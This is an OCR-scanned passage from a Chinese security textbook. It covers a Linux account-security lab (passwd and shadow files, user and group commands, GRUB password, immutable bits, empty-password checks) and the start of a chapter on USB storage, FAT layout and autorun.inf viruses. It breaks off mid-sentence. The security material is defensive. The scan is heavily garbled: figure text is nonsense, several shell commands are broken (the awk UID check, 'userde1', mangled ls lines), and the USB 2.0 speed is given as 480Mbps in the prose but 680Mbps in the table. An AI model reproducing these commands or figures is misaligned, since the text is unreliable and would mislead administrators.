(1) 掌握 Linux 中 账户 的 设置 。 

(2) 熟悉 设置 账户 的 文件 。 

【实验 环境 】 

VMware 十 Redhat Linux Enterprise 5. 0, 
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【实验 内 容 】 

Linux 系统 管理 员 的 职责 之 一 是 保证 用 户 资料 安全 ,作为 系统 管理 员 , 有 责任 发 现 和 报 
告 系统 的 安全 问题 。 系 统管 理 员 可 以 定期 查看 和 用 户 相 关 的 文件 ,以 发 现 一 些 不 常用 的 账 
户 是 否 突然 使 用 。 对 于 这 样 的 用 户 ,应 该 仔细 查看 并 追查 ,从 而 防止 一 些 黑客 的 行为 。 

Linux 系统 把 账户 分 为 了 3 类 , 即 普通 用 户 、 系 统 用 户 、 超 级 用 户 (root)。 


1. 普通 用 户 的 安全 设置 


普通 用 户 的 权限 是 受 限 制 的 ,一 般 情况 下 需要 用 户 自己 保护 自己 的 密码 ,并 经 常 改变 自 
己 的 密码 。 利 用 passwd 命令 修改 自己 的 密码 的 代码 如 图 8-53 所 示 。 

密码 的 设置 应 尽 可 能 复杂 ,可 以 包含 有 字 
母 数 字 和 一 些 特殊 符号 ,过 于 简单 的 密码 系统 
将 不 予 接受 。 在 输入 密码 时 ,系统 不 会 显示 密 


" N passwd: atı ati 
码 的 位 数 。 [zhangezhangtinux -)$ Ë 


2. 超级 用 户 安全 设置 图 8-53 设置 密码 


超级 用 户 (root) 对 系统 有 着 最 高 权限 ,可 以 对 系统 中 的 文件 和 目录 进行 读 写 。 超 级 用 
户 的 密码 一 旦 丢失 或 root 权限 被 黑客 利用 ,对 系统 的 危害 是 巨大 的 。 超 级 用 户 在 安全 方面 


应 该 注意 如 下 事项 。 
。 一 般 情况 下 ,不 要 使 用 root 账号 ,而 应 使 用 su 或 sudo 命令 从 普通 用 户 转 换 到 root 
用 户 。 


。 经 常 改变 root 用 户 的 密码 。 

° 密码 要 设置 的 尽 可 能 的 复杂 一 些 。 

。 不 要 在 没 注 销 用 户 的 情况 下 长 时 间 离 开 终端 。 

。 经 常 查看 系统 的 日 志 ,查看 系统 是 否 有 不 寻常 的 使 用 情况 。 

不 要 让 没有 密码 的 用 户 登 录 。 

查看 账户 的 异常 情况 。 

。 查看 是 否 存在 管理 员 以 外 的 UID 为 0 的 账号 存在 。 以 下 命令 可 以 查看 在 /etc/ 
passwd 文件 中 有 多 少 个 UID 为 0 的 账户 。 


awk -F : '$3--0 (print $ 1] ' /etc/passwd 


3. 账户 文件 的 安全 设置 


(1) 用 户 账户 文件 /etc/passwd 对 所 有 用 户 都 是 可 读 的 ,但 只 有 root 用 户 具有 写 的 权 
限 。 该 文件 中 的 每 行 保存 一 个 用 户 的 信息 ,每 个 账户 的 信息 用 ": ?进行 分 隔 。 依 次 为 用 
名 ,口令 .UID、 用 户 所属 组 的 GID、 全 名 、 用 户主 目录 及 
P 所 使 用 的 shell, 如 图 8-54 所 示 。 
E C 用 户 的 口令 以 x 占 位 ,真正 的 口令 经 过 加 密 后 存放 
CH {E /ctc/ shadow 文件 中 。 
(2) 由 于 /etc/passwd 文件 对 所 有 用 户 是 可 读 的 ， 


1 


bi] 


图 8-54 /etc/passwd 文件 的 内 容 
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如 果 有 用 户 取得 了 /etc/passwd 文件 , 便 可 以 穷 举 所 有 可 能 的 明文 通过 相同 的 算法 计算 出 
密 文 进行 比较 ,直到 相同 ,从 而 破解 口令 。 因 此 ,针对 这 种 安全 问题 ,Linux/Unix 广泛 采用 
“shadow( 有 影子) 文件” 机 制 ,将 加 密 的 口令 转移 到 /etc/shadow( 用 户口 令 信 息 ) 文 件 里 ,该 文 
件 只 为 root 超级 用 户 可 读 。/etc/shadow 文件 中 保留 的 是 用 md5 算法 加 密 后 的 口令 ,破解 
较为 困难 ,从 而 进一步 提高 了 系统 的 安全 性 。/etc/shadow 文件 的 每 行 是 8 个 冒号 分 割 的 9 
个 域 ,依次 为 用 户 名 、 加 密 的 口令 .从 1970 年 1 月 1 日 起 到 上 次 修改 口令 日 期 的 间隔 天 数 、 
口令 自 上 次 修改 后 ,要 隔 多 少 天 才能 再 次 修改 (为 0 表示 没有 限制 )、 自 上 次 修改 后 再 多 少 天 
内 必须 再 次 修改 、 日 人 从 区 国光 全 天 的 有 系统 向 用 户 发 出 警告 ,禁止 登录 前 用 户 名 还 有 效 的 天 
数 、 用 户 被 禁止 登录 的 时 间 及 保留 字段 ( 暂 未 使 用 ) ,如 图 8-55 所 示 。 

(3) /etc/group 文件 用 于 保存 组 群 的 账号 信息 。 所 有 用 户 都 可 以 查看 其 内 容 。 该 文件 
中 每 一 行 代表 一 个 组 群 的 信息 ,依次 为 组 名 、 组 口令 .GID、 用 户 列 表 , 如 图 8-56 所 示 。 其 
中 ,口令 字段 以 x 占 位 ,真正 的 口令 经 过 加 密 后 存放 在 /etc/gshadow 文件 中 。 


jont : $1 $6YDPOHKCSKhPE .dgd3CGwi 2WqL TN42/ : 15987 :6:09999 :7: : : 


jais 
|p:x:7:daemon, tp 


8-55 /etc/shadow 文件 的 内 容 8-56 /etc/group 文件 的 内 容 


(4) 如 同 用 户 账号 文件 的 作用 一 样 , 组 账号 信息 /etc/gshadaw 文件 也 是 为 了 加 强 组 口 
令 的 安全 性 ,防止 黑客 对 的 暴力 攻击 ,而 采用 的 一 种 将 组 口令 与 组 的 其 他 信息 相 分 离 
的 安全 机 制 。 每 一 行 表 示 一 个 组 群 的 信息 ,依次 为 用 户 组 名 、 加 密 的 组 口令 ,组 成 员 列 表 , 如 
图 8-57 所 示 。 

(5) /etc/skel 目录 存放 用 户 启动 文件 的 目录 ,该 目录 下 的 文件 都 是 隐藏 文件 。 当 为 新 
用 户 创 建 主 目录 时 ,系统 会 在 新 用 户 的 主 目录 下 建立 一 份 /etc/skel 目录 下 所 有 文件 的 副 
件 , 用 于 初始 化 用 户 的 主 目录 ,图 8-58 显示 了 /etc/skel 目录 下 的 内 容 。 


[root@zhanglinux <]# ls -la /etc/skel/ 


图 8-57 /etc/gshadow 文件 的 内 容 8-58 /etc/skel 目录 下 的 内 容 


4. 用 户 和 组 群 相关 的 命令 


(1) useradd: 添加 用 户 账号 ,命令 格式 为 “useradd [参数 ] 用 户 名 ”, 相 关 参 数 如 下 。 
* -c comment; 用 户 全 名 或 描述 

* -d home-dir: 指定 用 户主 目录 。 

° -e date; 禁用 账户 的 日 期 ,格式 为 “YYYY-MM-DD”。 

° -f days: 口令 过 期 后 ,账户 禁用 前 的 天 数 。 

* -g group-name: 用 户 所 属 主 组 群 的 组 群 名 称 或 GID. 


* -G group-list; 用 户 所 属 的 附属 组 群 列表 ,多 个 项 目 用 逗号 分 隔 。 
。-m; 车 主 目录 不 存在 , 则 创建 它 。 

° -M; 不 创建 用 户主 目录 。 

。 -n: 不 要 为 用 户 创建 用 户 私 人 组 群 。 

° -r; 创建 UID 小 于 500 的 不 带 主 目录 的 系统 账户 。 

。-p: 加 密 的 口令 。 

* cs; 指定 用 户 登 录 Shell, 默 认为 /bin/bash。 

* -u UID; 指定 用 户 的 UID, 它 必须 是 唯一 的 , 且 大 于 499。 


示例 代码 如 下 : 

// 建 立 用 户 账号 zhang 

# useradd zhang 

// 查 看 passwd 文件 中 添加 的 用 户 账号 信息 

# tail -1 /etc/passwd // 输 出 文件 的 最 后 一 行 


# tail -1 /etc/shadow 

// 为 用 户 zhang 设置 口令 

# passwd zhang 

# useradd -g groupzhang zhang // 将 zhang 这 个 用 户 添加 到 groupzhang 组 中 


(2) usermod: 修改 用 户 信息 ,命令 格式 为 “usermod [-c comment] [-d home, dir[-m]] 
[-e exoire date] [-f inactive time] [-g initial group] [-G group [,…]] [-1 login. name] 


[-p passwd] [-s shell] [-u uid] [-o]] [-L|-U] login”, 示 例如 代码 如 下 。 


// 使 用 usemod 命令 改变 zhang 的 登录 名 为 zhangl 

# usermod -1 zhangl zhang 

// 查 看 passwd 文件 中 发 生 的 改变 

# tail -1 /etc/passwd 

zhangl: x: 500: 500: : /home/zhangl: /bin/bash 

// 使 用 "usermod - L" fir 9f sE HJ P: zhangl, 使 其 不 能 登录 

# usermod -L zhang1 

# tail -1 /etc/shadow 

zhangl:! $ 1 $ tkZyzrTR $ uL/nccMtR7kLF60K2JbsR. :15987:0:99999:7::: 

# usermod -U zhang1 // 解 锁 zhang1, 解 锁 后 的 用 户口 令 位 将 没有 "!"。 


(3) userdel: 删除 用 户 账号 ,命令 格式 为 “userdel [~r] [用 户 账号 ]”。 不 要 轻易 用 -r 
参数 ,因为 该 命令 会 在 删除 用 户 的 同时 删除 用 户 所 有 的 文件 和 目录 ,示例 代码 如 下 。 


# grep zhangl /etc/passwd // 查 询 用 户 账 号 zhangl 存在 

zhangl :x:500:500: : /home/zhangl : /bin/bash 

# userdel zhang1 // 删 除 用 户 zhang1 

# grep zhangl /etc/passwd // 再 次 查询 ,用 户 账号 zhangl 已 不 存在 
# 11 — d /hone/zhangi/ // RÀ P zhang1 的 宿主 目录 并 未 删除 
// 删 除 用 户 并 删除 用 户 宿 主 目录 


# userde1 -r zhangl 


(4) groupadd: 添 加 组 账户 ,命令 格式 为 “groupadd [参数 ] 组 账号 名 ”, 相 关 参 数 如 下 。 
° -g gid: 指定 组 ID 号 。 


实践 


。 -o: 允许 组 ID 号 ,不 必 唯 一 。 

° -r; 加 入 组 ID 号 , 低 于 499 系统 账号 。 

° f: 加 入 已 经 有 的 组 时 ,发 生 错误 程序 退出 。 
示例 代码 如 下 : 

// 建 立 组 账号 groupzhang 

# groupadd groupzhang 


// 查 询 group 文件 中 groupzhang 组 已 建立 
# grep groupzhang /etc/group 


// 普 通 组 账号 的 GID 大 于 500 
# groupadd -r sysgroup // 建 立 系统 组 账号 sysgroup 
//grep sysgroup /etc/group // 系 统 组 账号 的 GID 小 于 500 


(5) groupmod: 修改 组 账号 信息 ,命令 格式 为 “groupmod [参数 ] 用 户 组 账号 名 ”, 相 关 
参数 如 下 : 

* -g —#HË ID> :指定 组 群 的 ID. 

° -o: 重复 使 用 群 组 识别 码 。 

。-n 志 新 组 群 名 称 之 : 设置 欲 使 用 的 组 群 名 称 。 

示例 代码 如 下 : 


// 查 询 文件 group 中 组 账号 groupzhang 的 记录 
# grep groupzhang /etc/group 
groupzhang:x:500: 

//groupzhang 组 的 GID 为 502 

// 改 变 groupzhang 组 的 GID 为 503 

# groupmod -g 503 groupzhang 

# grep groupzhang /etc/group 
groupzhang:x:503: 

//groupzhang 组 的 GID 已 经 设置 为 503 
// 改 变 组 groupzhang 的 名 称 为 newgroup 
# groupnod -n newgroup groupzhang 


(6) groupdel; 删除 组 账号 ,命令 格式 为 “groupdel [参数 ] 用 户 组 账号 名 ”。 

示例 代码 如 下 。 

# groupdel newgroup 

groupdel: cannot remove user's primary group. 

// 当 有 用 户 使 用 组 账号 作为 私有 组 时 不 能 删除 该 组 账号 , 必须 删除 组 内 的 账户 才 可 以 删除 组 
(7) 其 他 相关 命令 ,如 下 。 

。 gpasswd: 为 组 添加 或 删除 成 员 。 

。 chage: 修改 用 户 密码 有 效 期 。 

chfn: 修改 用 户 信息 。 

chsh; 改变 用 户 的 shell 类 型 。 

pwck: 验证 /etc/passwd 和 /etc/shadow 文件 的 一 致 性 , 若 发 现 不 合理 的 数据 项 ,将 
会 提示 用 户 对 出 现 的 错误 进行 删除 。 
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。 grpck: 用 来 验证 /etc/group 和 /etc/gshadow 文件 的 一 致 性 和 正确 性 。 

5. 单 用 户 模式 

Linux 的 运行 级 别 分 为 7 个 ,通常 情况 下 使 用 的 
级 别 5 是 图 形 界面 。 


- 旦 超级 管理 员 root 用 户 忘 记 密码 ,将 无 法 管理 系统 ,ji 


3 和 5, 运行 级 别 3 是 文本 界面 ,运行 


这 时 候 就 要 进入 单 用 户 模 式 , 单 
用 户 模式 用 数字 1 表示 ,这 时 候 的 系统 将 不 再 是 多 用 户 的 ,也 没有 网 络 。 在 此 模式 下 可 以 修 
改 root JH P. Pag 但 这 也 是 单 用 户 模式 的 一 个 漏洞 ,如 果 被 别有用心 的 人 修改 了 root 的 


密码 ,系统 将 处 于 一 个 不 安全 的 状态 ,因此 可 以 通过 为 grub 文件 加 密 的 方式 增强 安全 性 。 
图 8-59 所 示 即 jet 1 的 登录 界面 


图 8-59 单 用 户 登录 界面 
首先 对 grub 进行 密码 设置 ,代码 如 图 8-60 所 示 


Note that ym 


da not have tn rerun grub after making changes to this lile 
NOTICE: Y 


Li (2.6.10-0.e15) 


2.6.18-B.cl5 ro root=LABEL=/ rhgb quiet 
trd-2.6.18-8.e15. img 


8-60 grub 文件 的 内 容 
在 splashimage 行 下 面 添加 密码 属性 ,如 图 8-61 所 示 


splash.xpw.gz 


ix Server B-8.e15) 


6.18-8.e15 ro ront=LABEL=/ rhgh quiet 
2.6.18-8.c15. ing 


图 8-61 添加 密码 属性 
但 是 明文 的 密码 是 不 安全 的 ,采用 MD5 加 密 方式 对 密码 进行 加 密 , 如 图 8-62 所 示 。 


BUR 生成 加 密 的 口令 
此 次 输入 口令 


图 8-62 利用 MDs 进行 口令 加 密 


214 tense msn (E) 


将 加 密 后 的 口令 粘贴 到 grub 文件 中 ,代码 如 图 8-63 所 示 。 


图 8-63 ” 带 有 加 密 口令 的 grub 文件 


6. 账户 管理 的 几 个 技巧 


(1) 删除 默认 的 不 常用 的 账户 和 组 。 安 装 Linux 时 ,会 产生 很 多 不 常用 的 默认 账户 ,这 
些 账 户 的 存在 是 系统 的 不 安全 因素 之 一 ,所 以 对 这 些 账户 要 进行 删除 ,如 adm, Ip, sync, 
3f n M E 认 安 装 的 组 ,如 adm, lp, news, 


shutdown, halt, news, uucp, games, gopher 


uucp, games, dip 等 ,如 图 8-64 所 示 。 


Lrootüzhanglinux JW userdel neus 
Lrootüzhanglinux 7]? groupdcl news 


[rootGzenglinux -It _ 


8-64 ”删除 news 账户 和 组 
(2) 设置 账号 相关 配置 文件 的 不 可 改变 位 。 利 用 


隐藏 属性 可 以 保护 文件 不 被 改变 , 因 


为 和 用 户 相 关 的 文件 都 是 黑客 攻击 的 对 象 ,如 图 8-65 所 示 。 


x “JH chattr + 
x "IN chattr + 


x TIt chattr + 
x 7] chattr +i /etc/gshadow 


图 8-65 ”增加 相关 文件 的 不 可 改变 位 
要 增加 用 户 和 组 时 ,需要 把 i 属性 去 掉 , 如 图 8-67 Bron. 


[rootBzhanglinux ~]# chattr 
7)f chattr -i ¿ 
[rootGzhanglinux 7] chattr -i / 


[rootBzhanglinux 7] chattr -i ¿ 
IrootBzhanglinux 7]& chattr -i /etc/gshadow 


图 8-66 ”删除 不 可 改变 位 


(3) 检查 空 密码 账号 。 密 码 为 空 的 账户 的 存在 意味 着 没有 授权 的 用 户 也 可 以 访问 系 
统 , 这 是 Linux 服务 器 的 一 个 安全 威胁 。 对 系统 管理 员 来 说 ,有 必要 经 常 检查 /etc/passwd 
文件 中 是 否 存在 这 一 类 用 户 , 若 有 须 删 除 之 ,如 图 8-67 所 示 。 


图 8-67 检查 是 否 存在 密码 为 空 的 账户 


Óó  udglidYv 


D 移动 存储 设备 安全 


9.1 移动 存储 设备 种 类 


移动 存储 设备 ,就 是 可 以 在 不 同 终端 间 移动 的 存储 设备 ,为 资料 存 
储 提供 了 很 大 的 方便 。 如 移动 硬盘 、USB 闪存 盘 、 可 擦 写 光 盘 等 存储 设 
备 , 通 过 外 部 接口 或 相应 的 设备 ,不 需 打开 机 箱 , 可 方便 地 进行 读 写 操 
作 , 这 类 设备 统称 为 移动 存储 器 或 移动 存储 设备 。 


9.1.1 移动 存储 设备 的 分 类 


根据 不 同 的 分 类 方法 ,可 以 将 移动 存储 设备 分 不 同类 型 。 如 按 存储 
介质 不 同 可 分 为 磁 介 质 、 光 介质 和 半导体 介质 ; 按 接 口 不 同 可 分 为 专用 
接口 型 和 通用 接口 型 ; 按 是 否 需要 驱动 器 可 分 为 有 驱动 器 型 和 无 驱动 
器 型 。 


9.1.2 常见 的 移动 存储 设备 


1. 软盘 


软盘 是 个 人 计算 机 中 最 早 使 用 的 可 移动 存储 介质 。 软 盘 的 读 写 是 
通过 软盘 驱动 器 完成 的 。 常 用 的 就 是 容量 为 1. 44MB 的 3. 5 英寸 软盘 。 
软盘 的 容量 小 , 存 取 速度 慢 ,但 可 装 可 外 .携带 方便 。 

20 世纪 60 年 代 IBM 公司 推出 世界 上 第 一 张 软盘 ,直径 32 英寸 ; 
1971 年 Alan Shugart 推出 一 种 直径 8 英寸 的 表面 涂 有 金属 氧化 物 的 塑 
料 质 磁盘 ,容量 为 81KB; 1979 年 索尼 公司 推出 3. 5 英寸 的 双 面 软盘 , 容 
量 为 875KB; 20 世纪 90 年 代 3.5 英寸 /1. 44MB 软盘 一 直 是 PC 标准 数 
据 传输 的 主要 方式 之 一 。 随 着 U dk .光盘 的 发 展 ,网 络 应 用 的 普及 ,软盘 
逐渐 被 替代 。 

2. 光盘 


光盘 与 其 他 移动 存储 设备 在 工作 原理 、 存 储 介 质 、 速 度 方面 有 着 很 
大 的 区 别 。CD-R 光盘 的 特点 是 只 写 一 次 , 写 完 后 无 法 被 改写 ,但 可 以 在 


实践 


CD-ROM 驱动 器 和 CD-R 刻录 机 上 被 多 次 读 取 。CD-R 光盘 的 最 大 优点 是 成 本 低 .寿命 长 ， 
因此 CD-R 已 逐渐 成 为 数据 存储 的 主流 产品 ,在 数据 备份 .数据 库 分 发 .数据 交换 、 档 案 存储 
和 多 媒体 软件 出 版 等 领域 获得 了 广泛 应 用 。 


3.U& 


U 盘 是 闪存 的 一 种 ,因此 也 叫 闪 盘 。 它 是 一 种 使 用 USB 接口 的 无 须 物理 驱动 器 的 微型 
高 容量 移动 存储 产品 ,可 通过 USB 接口 与 电脑 连接 ,实现 即 择 即 用 。 相 对 于 其 他 可 携 式 存 
储 设备 (尤其 是 软盘 片 ), 闪 存盘 有 许多 优点 ,例如 携带 方便 、 操 作 速 度 快 .体积 小 .存储 数据 
多 、 性 能 可 靠 。 


4. 存储 卡 


存储 卡 是 用 于 手机 、 数 码 相 机 、 便 携 式 电 脑 .MP3 和 其 他 数码 产品 上 的 独立 存储 介质 ， 
一 般 是 卡片 的 形态 , 故 统称 为 “存储 卡 ”, 又 称 为 “数字 存储 卡 "“ 数 码 存储 卡 " 等 。 存 储 卡 具 
有 体积 小 巧 .携带 方便 、 存 储 数据 多 、 使 用 简单 的 优点 。 


9.2 U 盘存 储 原理 
9.2.1 USB 2.0 协议 规范 


USB 的 英文 全 称 为 Universal Serial Bus ,中文 名 称 为 通用 串 行 总 线 。USB 接口 具有 传 
输 速 度 快 ,支持 热 插 拔 以 及 连接 多 个 设备 的 特点 , 比 ISA 等 其 他 总 线 方便 。 目 前 已 经 被 各 
类 外 部 设备 广泛 采用 。USB 2.0 采用 8b 编码 ,USB 2.0 使 用 了 4 个 针脚 ,其 中 数据 收发 各 
占 一 个 针脚 ,电源 、 地 线 各 占 一 个 针脚 ,USB 1. 0 传输 速度 较 低 ,USB 2. 0 High-Speed( 高 速 
版 ) 则 可 以 达到 速度 480Mbps, 是 USB 1. 0 的 几 十 倍 , 并 且 可 以 向 下 兼容 USB, USB 2.0 基 
于 半 双 工 二 线 制 总 线 的 数据 传输 方式 ,因此 只 能 提供 单 向 数据 流传 输 。 


9.2.2 USB 3.0 协议 规范 


USB 2. 0 的 速度 已 无 法 满足 应 用 需要 ,USB 3. 0 也 就 应 运 而 生 。USB 3. 0 新 规范 的 传 
输 速度 大 约 是 USB 2.0 的 10 倍 ,USB 3. 0 在 原 有 4 线 结构 (电源 、 地 线 、2 条 数据 ) 的 基础 上 
增加 了 4 条 线路 ,用 于 接收 和 传输 信号 ,可 广泛 用 于 PC 外 围 设备 和 电子 产品 。USB 3. 0 使 
用 数据 中 常用 的 8bit/10bit 高 速 编 码 ,并 由 物理 层 负责 信号 编码 解码 。USB 3.0 在 保持 与 
USB 2. 0 的 兼容 性 的 同时 ,采用 了 对 偶 单纯 形 四 线 制 差分 信号 线 ,支持 双向 并 发 数据 流传 
输 , 在 信号 传输 的 方法 上 采用 主机 控制 的 异步 传输 方式 ,全 双 工 的 数据 传输 速度 可 高 达 
5.0Gbps。 这 也 是 USB 3. 0 新 规范 速度 猛 增 的 关键 原因 。 表 9-1 给 出 了 USB 2. 0 与 USB. 
3.0 物理 结构 及 通信 协议 的 区 别 。 


表 9-1 USB 2.0 5 USB 3.0 技术 对 比 


技术 名 称 USB 2.0 USB 3.0 
传输 速率 680Mbps 5Gbps 
电源 输出 0.5A 输出 1A 
数据 传输 半 双 工 全 双 工 
编码 位 数 8bit lobit 
物理 总 线 4 线 8 线 
电气 特性 4 个 针脚 8 个 针脚 


9.2.3 U 盘 的 基本 工作 原理 


USB 端口 同 电脑 相连 接 , 主 控 芯 片 可 以 把 U 盘 识 别 为 “可 移动 磁盘 ”, 并 对 各 部 件 进行 
协调 管理 和 下 达 各 项 动作 指令 , 主 芯 片 相当 于 U SEI" XT"; FLASH 芯片 具有 断 电 以 后 
资料 能 够 长 期 保存 且 掉 电 不 丢失 的 功能 。 被 操作 系统 识别 ,接收 存 取 数 据 的 动作 指令 后 ， 
USB 移动 存储 盘 会 做 相应 的 处 理 。 在 源 极 和 漏 极 之 间 电 流 单 向 传导 的 半导体 上 形成 储存 
电子 的 浮动 栅 。 浮 动 栅 被 一 层 硅 氧化 膜 绝 缘 体 覆 盖 着 , 它 的 上 面 是 控制 传导 电流 的 选择 / 控 
制 栅 。 在 硅 底 板 上 形成 的 浮动 栅 中 是 否 有 电子 决定 着 数据 是 0 还 是 1, 有 电子 为 0, 无 电子 
为 1。 在 写 人 前 从 所 有 浮动 栅 中 导出 电子 对 数据 进行 初始 化 ,这 时 所 有 数据 皆 为 "1”。 写 人 
时 只 有 数据 为 0 时 才 进 行 写 人 ,数据 为 1 时 不 做 任何 操作 。 写 入 0 时 ,向 栅 电 极 和 漏 极 施加 
高 电压 ,增加 在 源 极 和 漏 极 之 间 传 导 的 电子 能 量 , 这 样 电 子 就 会 突破 氧化 膜 绝缘 体 , 进 入 浮 
动 栅 。 读 取 数 据 时 ,向 栅 电 极 施加 一 定 的 电压 ,电流 大 为 1, 电流 小 则 定 为 0。 浮动 栅 没 有 电 
子 的 状态 下 ,在 栅 电 极 施加 电压 的 状态 时 向 漏 极 施加 电压 , 源 极 和 漏 极 之 间 由 于 大 量 电子 的 
移动 ,就 会 产生 电流 。 而 在 浮动 栅 有 电子 的 状态 下 , 沟 道中 传导 的 电子 就 会 减少 ,从 而 实现 

因为 与 传统 的 硬盘 工作 原理 不 同 , 所 以 U 盘 不 用 像 硬盘 那样 进行 碎片 整理 。 


9.2.4 U 盘 文件 系统 

U 盘 上 的 数据 按照 不 同 的 特点 和 作用 大 致 可 分 为 5 部 分 ,分 别 为 MBR 区 、DBR K, 
FAT IX,FDT IX fill DATA 区。 

1. 主 引 导 记 录 (MBR) 


绝对 扇 区 号 为 MBR LBA —0x00000000 处 是 主 引导 记录 ,等 同位 于 硬盘 的 0 磁道 0 柱 
Ll 扇 区 。 在 总 共 512 字 节 的 主 引导 扇 区 中 ,MBR 只 占用 其 中 的 446 个 字 节 (ofs:0 - ofs: 
1BDH) ,另外 64 个 字 节 (ofs:1BEH - ofs:1FDH) 交 给 了 DPT(Disk Partition Table, 盘 分 区 
表 ) ,最 后 两 个 字 节 “55 AA”(ofs:1FEH - ofs:1FFH) 是 分 区 的 结束 标志 。 


2. 系统 引导 记录 (DBR) 


绝对 扁 区 号 为 DBR_LBA 一 MBR. PT[0]. RelativeSectors 处 是 DBR, 等 同位 于 硬盘 的 


实践 


0 磁道 1 柱 面 1 3 DC C512 FW) ,是 操作 系统 可 以 直接 访问 的 第 一 个 扇 区 , 它 包 括 一 个 引导 
程序 和 一 个 被 称 为 BPB(Bios Parameter Block) 的 本 分 区 参数 记录 表 。 引 导 程 序 的 主要 任 
务 是 当 MBR 将 系统 的 控制 权 交 给 它 时 ,判断 本 分 区 根 目录 前 两 个 文件 是 不 是 操作 系统 的 
引导 文件 (以 DOS 为 例 , 即 是 Io. sys 和 Msdos. sys)。 如 果 确 定 存 在 ,就 把 其 读 入 内 存 , 并 把 
控制 权 交 给 该 文件 。BPB 参数 块 记录 着 本 分 区 的 起 始 扇 区 、 结 束 扇 区 ,文件 存储 格式 、 硬 盘 
介质 描述 符 、 根 目录 大 小 FAT 个 数 及 分 配 单元 的 大 小 等 重要 参数 。 


3. 文件 分 配 表 (FAT) 


绝对 扇 区 号 为 FAT_LBA = DBR_LBA + BPB_wReservedSec 处 是 文件 分 配 表 ,是 
DOS 文件 组 织 结构 的 主要 组 成 部 分 。DOS 进行 分 配 的 最 基本 单位 是 徐 。 文 件 分 配 表 反 映 
硬盘 上 所 有 入 的 使 用 情况 ,通过 查 文件 分 配 表 可 以 得 知 任 一 徐 的 使 用 情况 。DOS 在 给 一 个 
文件 分 配 空间 时 总 先 扫 描 FAT, 找 到 第 一 个 可 用 簇 ,将 该 空间 分 配给 文件 ,并 将 该 簇 的 簇 号 
填 到 目录 的 相应 段 内 , 即 形成 了 “ 簇 号 链 ”"。FAT 就 是 记录 文件 徐 号 的 一 张 表 。FAT 的 头 
两 个 域 为 保留 域 ,对 FAT12 来 说 是 3 个 字 节 ,对 FATI 来 说 是 4 个 字 节 。 其 中 第 一 个 字 
节 用 来 描述 介质 ,其 余 字 节 为 FFH。 介 质 格 式 与 BPB 相同 。 


4. 文件 目录 表 (FDT) 


16 XE IX y FDT LBA = FAT LBA + BPB bNumFATs * BPB wSecPerFAT 处 
是 文件 目录 表 , 是 DOS 文件 组 织 结构 的 又 一 重要 组 成 部 分 。 文 件 目录 分 为 根 目录 , 子 目录 
两 类 。 根 目录 有 一 个 , 子 目录 可 以 有 多 个 。 子 目录 下 还 可 以 有 子 目录 ,从 而 形成 树 状 的 文件 
目录 结构 。 子 目录 其 实 是 一 种 特殊 的 文件 ,DOS 为 目录 项 分 配 32 字 节 。 


5. 数据 区 (DATA) 
数据 区 绝对 扇 区 号 = 根 目录 绝对 扇 区 号 十 (32X 根 目录 中 目录 项 数 )/ 每 扇 区 字 节 数 ， 
表达 式 为 DATA_LBA = FDT LBA 十 (32 * BPB_wRootEntry)/ BPB_wBytesPerSec。 


9.2.5 U 盘 启 动 模式 
BIOS 能 识别 接受 的 有 软驱 (USB-FDD)、 大 软驱 (USB-ZIP)、 硬 盘 (USB-HDD)、 光 了 驱 
(USB-CDROM) 等 模式 ,U 盘 以 相应 启动 模式 启用 后 就 可 以 模拟 成 这 些 的 相关 设备 使 用 。 
1. USB-FDD 


启动 后 U 盘 的 盘 符 是 A, 容 量 1. 44MB; 软盘 早已 退出 历史 舞台 ,故此 模式 目前 很 少 
应 用 。 


2. USB-ZIP 


启动 后 U 盘 的 盘 符 是 A; USB-ZIP 十 是 增强 的 USB-ZIP 模式 ,根据 电脑 的 BIOS 支持 
情况 不 同 , 在 DOS 启动 后 有 些 显示 A: 盘 ,有 些 显示 C: 盘 ,支持 USB-ZIP/USB-HDD 双 模 
式 启动 ,从 而 达到 很 高 的 兼容 性 。 


3. USB-HDD 


启动 后 U 盘 的 盘 符 是 C。USB-HDD 硬盘 仿真 模式 兼容 性 高 ,但 对 于 一 些 只 支持 USB- 
ZIP 模式 的 电脑 则 无 法 启动 。USB-HDD 十 增强 的 USB-HDD 模式 下 , DOS 启动 后 显示 
C: 盘 ,兼容 性 高 于 USB-HDD 模式 。 同 样 对 仅 支持 USB-ZIP 的 电脑 无 法 启动 。 


4. USB-CDROM 


启动 后 U 盘 的 盘 符 是 光驱 盘 符 。USB-CDROM 光盘 仿真 模式 兼容 性 比较 高 ,新 老 主 
板 一 般 都 可 以 ,优点 是 可 以 像 光盘 一 样 使 用 (如 进行 Windows 系统 安装 ) ,缺点 是 将 失去 对 
这 部 分 U 盘 空 间 的 写 权 利 , 剩 余 空 间 会 被 识别 成 为 一 个 独立 的 U 盘 , 可 以 为 Removable 
盘 ,当然 也 可 以 做 成 Fixed 盘 , 并 进一步 分 区 。 


9.2.6 UEF 


在 U 盘 出 三 时 最 后 一 道 工 序 是 量 产 。 而 现实 中 ,要 制作 带 CDROM 盘 的 U 盘 , 或 者 清 
BR U 盘 原 有 的 只 读 分 区 及 固化 数据 ,就 要 用 到 量 产 。 

量 产 前 需要 识别 U 盘 的 主 控 方案 ,也 就 是 芯片 方案 。 一 般 使 用 ChipGenius 软件 查看 ， 
然后 再 下 载 对 应 的 量 产 工具 。 一 般 U 盘 都 能 找到 对 应 自己 主 控 方案 的 量 产 工具 ,并 且 这 种 
量 产 工具 大 都 不 具有 通用 性 ,所 以 需要 特别 注意 量 身 选 择 量 产 工 具 。 


9.3 autorun. inf 文件 
9.3.1 autorun. inf 文件 及 病毒 感染 


autorun. inf 被 广泛 应 用 于 光盘 的 制作 中 ,一 般 位 于 系统 的 根 目录 下 , 它 是 系统 用 来 加 
载 某 些 硬件 设备 (如 可 移动 磁盘 、 优 盘 等 ) 时 用 的 ,可 用 来 自动 运行 指定 的 文件 。 最 初 
AutoRun 用 在 安装 盘 里 ,帮助 用 户 正确 和 运行 存储 设备 内 想 要 运行 的 文件 ,实现 自动 安装 。 

在 Windows XP 以 前 的 所 有 设备 都 会 依照 autorun. inf 启动 。 在 Windows XP SPO 到 
SP3 系统 及 Windows 7 系统 下 ,DRIVE_CDROM 会 先 运行 aautorun. inf, 若 不 存在 则 运行 
AutoPlay。 另 外 , 双击 移动 设备 也 会 启动 autorun. inf DRIVE. RREMOVABLE 和 
DRIVE FIXED 可 运行 AutoPlay, 但 AutoPlay 的 默认 项 是 由 autorun. inf 定义 的 。 还 有 一 
些 其 他 设备 会 依照 autorun. inf 启动 。 

一 些 病毒 正 是 利用 系统 能 自动 运行 指定 的 文件 这 一 特点 通过 优盘 或 者 移动 硬盘 等 介质 
